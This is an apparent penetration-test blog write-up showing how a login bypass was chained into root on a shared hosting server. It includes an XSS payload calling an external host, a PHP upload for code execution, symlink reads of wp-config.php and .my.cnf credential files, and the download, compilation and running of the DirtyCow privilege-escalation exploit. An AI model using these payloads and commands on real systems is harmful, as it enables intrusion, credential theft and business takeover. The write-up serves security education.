A cocktail of Vulnerabilities

A journey from bypassing login panel to getting r00t level access on a server with potential business takeover

Classic SQLi to bypass authentication mechanism
Portal view with User Management Module
Create User function exhibiting 3 different roles
XSS Payload to redirect to csrf page: <script>window.location('http://vulnerabilities.in/Surprise');</script>
<iframe src="/csrf.html" width=0 height=0>
Profile page with image upload functionality
<?php echo phpinfo();?>
RCE — phpinfo() method execution on target server
1. /etc/valiases<?php
$dir = '/etc/valiases';
$files = scandir($dir);
Email forwarders are set here which reveals domain name aliases
2. /etc/named.confpreg_match_all("#named/(.*?).db#", $file, $r);
//Contain 2 entries, internal & external
$domains = array_unique($r[1]);Consists of zone entries for all the domains in that server.3. http://viewdns.info/reverseip/?host=domain.com
ln -s /home/target/public_html/includes/config.php symlink.txt
ln -s / symroot
ln -s /home/example/public_html/domain1/wp-config.php symlink1.txt
ln -s /home/example/public_html/domain2/blogs/wp-config.php symlink2.txt
ln -s /home/example/public_html/domain3/boxedlayout/wp-config.php symlink3.txt
Wordpress configuration file revealing Database credentials
Username: Ciph3r00t
Password: MD5Hash(password)=> 5f4dcc3b5aa765d61d8327deb882cf99
Network interfaces configuration
cat /etc/.my.cnf
Dedicated domain control panel access
Reseller domain control panel access
THN Tweet on 21st Oct 2016 about DirtyCow Exploit
Download:curl https://github.com/FireFart/dirtycow/blob/master/dirty.cCompilation:gcc -pthread dirty.c -o dirty -lcryptExecution:chmod +x dirty./dirtysu firefart
Downloading, compiling and executing exploit on target server
Escalating and switching to firefart user having r00t privileges created by dirtyCow exploit
  • XSS + CSRF →Uploader restrictions bypass→ Upload PHP code → Trigger RCE
  • XSS + CSRF → Upload rev shell → Reverse DNS + Symlink + Extract credentials from config files → Upload DBMS script and connect to Database →Backdoor CMS accounts
  • XSS + CSRF → Upload rev shell →Priv Escalation →r00t access
  • Port Scanning → Services mapping → Extracting Cpanel credentials → Login to domain control panel → Switching to Reseller Account → Request for Domain Transfer → Business TakeOver
Snap from the Assessment Report

Keep training and keep learning until you get it Right.

Thank you for taking time to read this.

  • Make sure all the stakeholders are informed about pentesting activities beforehand to avoid any damages.
  • Hosting/Domain/Other Service providers may suspend the accounts if found suspicion (make sure they’re aware that it’s an authorized activity).
  • Suspension of accounts result into business downtime for hours and hours (monetary/reputation loss).

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store